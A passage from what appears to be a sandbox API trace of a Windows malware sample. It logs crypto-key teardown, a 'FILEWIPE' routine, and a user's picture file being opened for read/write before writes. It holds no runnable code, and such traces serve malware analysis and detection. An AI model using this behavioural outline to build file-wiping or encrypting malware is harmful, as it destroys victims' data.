hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0041.055] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.055] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.055] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.055] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.055] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0041.055] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.059] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.059] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.059] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.062] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.062] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.062] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0041.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.063] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.063] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.063] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0041.063] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.063] CryptDestroyKey (hKey=0x7c2200) returned 1 [0041.063] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.064] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.064] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0041.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.064] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.064] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0041.064] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0041.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0041.064] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.064] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0041.064] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0041.064] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.064] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.064] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.064] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.064] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0041.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.065] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.065] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.065] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.065] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.065] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.065] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0041.065] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0041.065] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.065] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0041.065] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.065] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0041.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0041.066] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.066] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.066] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0041.066] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.066] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.066] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.066] FreeLibrary (hLibModule=0x754b0000) returned 1 [0041.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0041.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0041.066] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0041.066] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.066] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.066] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.067] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.067] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.067] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0041.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0041.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.068] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.068] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.068] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ab63280, ftCreationTime.dwHighDateTime=0x1d5bf24, ftLastAccessTime.dwLowDateTime=0x9c732570, ftLastAccessTime.dwHighDateTime=0x1d5b9ec, ftLastWriteTime.dwLowDateTime=0x9c732570, ftLastWriteTime.dwHighDateTime=0x1d5b9ec, nFileSizeHigh=0x0, nFileSizeLow=0xece8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="dlVzwDk.bmp", cAlternateFileName="")) returned 0x7c2100 [0041.068] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0041.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0041.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.068] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.068] CharLowerBuffW (in: lpsz="byte[60648]", cchLength=0xb | out: lpsz="byte[60648]") returned 0xb [0041.068] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.068] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0041.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.068] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.068] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0041.068] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0041.069] FreeLibrary (hLibModule=0x76b40000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.070] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.070] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.070] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.070] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0041.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.070] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0041.071] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.071] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\dlvzwdk.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0041.071] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.071] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.071] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.071] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.071] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0041.071] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.071] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.071] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.072] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.072] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.072] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.072] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.072] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.072] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0041.072] PeekMessageW (in: 